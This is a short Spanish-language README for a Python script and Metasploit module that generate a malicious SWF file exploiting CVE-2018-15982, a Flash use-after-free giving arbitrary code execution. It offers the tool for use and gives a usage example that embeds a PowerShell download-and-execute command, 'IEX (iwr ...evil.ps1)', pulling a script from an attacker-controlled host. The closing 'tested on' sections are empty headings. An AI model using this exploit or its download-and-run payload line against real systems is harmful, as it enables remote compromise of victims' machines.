
Script y módulo de Metasploit para CVE-2018-15982
Este script crea un payload swf para CVE-2018-15982, basado en el PoC de https://github.com/smgorelik/Windows-RCE-exploits. La vulnerabilidad fue descubierta por Chenming Xu y Ed Miles de Gigamon ATR.
La vulnerabilidad es un fallo de use-after-free que permite la ejecución arbitraria de código en Flash. Puede encontrar más información en los siguientes enlaces.
Nota: Actualmente solo se realiza el spraying de un bloque; lo noté después de crear el script.
Uso:
python create_swf.py <command> <output file name>
Ejemplo de uso:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
Probado en:
Crear payload:

Ejecutar payload:

Confirmar ejecución:

